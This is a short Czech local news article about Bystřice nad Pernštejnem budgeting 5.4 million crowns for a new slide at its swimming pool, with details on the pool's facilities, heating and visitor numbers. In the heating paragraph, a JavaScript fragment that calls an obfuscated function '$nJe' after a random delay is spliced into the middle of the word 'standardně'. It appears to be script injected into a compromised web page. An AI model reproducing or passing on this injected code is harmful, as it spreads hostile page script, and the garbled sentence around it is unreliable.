Rainbow page separator

Po dvaceti letech na bystřickém koupališti přibude skluzavka

Středa, 27. Leden 2021

Bystřice nad Pernštejnem / Finanční částku ve výši 5,4 milionu korun vyčlenili v letošním rozpočtu zástupci bystřické radnice na pořízení dvacetimetrové skluzavky na koupaliště. Dalších sto tisíc korun pak poslouží k výměně filtrace.
Bystřické koupaliště, které bylo uvedeno do provozu v červnu roku 2002, zahrnuje dětský, relaxační a plavecký bazén, přičemž nechybí brouzdaliště pro nejmenší a vodní hříbek. Další nabídka čítá bufet, dvě hřiště na plážový volejbal, dětský koutek, trampolínu a stůl na stolní tenis. Již několik let po otevření areálu se zvažovalo rovněž pořízení tobogánu, později ale bylo od záměru upuštěno. Skluzavka byla v plánu minimálně deset let.
Bystřické koupaliště využívá zbytkové teplo z biomasové kotelny, kterým je voda v bazénech standom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andardně přihřívána. V dětském bazénu bývá teplá kolem 26°C, v rekreačním bazénu 25°C a v nejchladnějším plaveckém bazénu dosahuje obvykle teploty mezi 22 až 24°C. Nejvíce návštěvníků na koupaliště zavítalo v roce 2003, a to 41 tisíc, nejméně jich bylo v roce 2006, kdy se přišlo vykoupat pouhých devět tisíc lidí.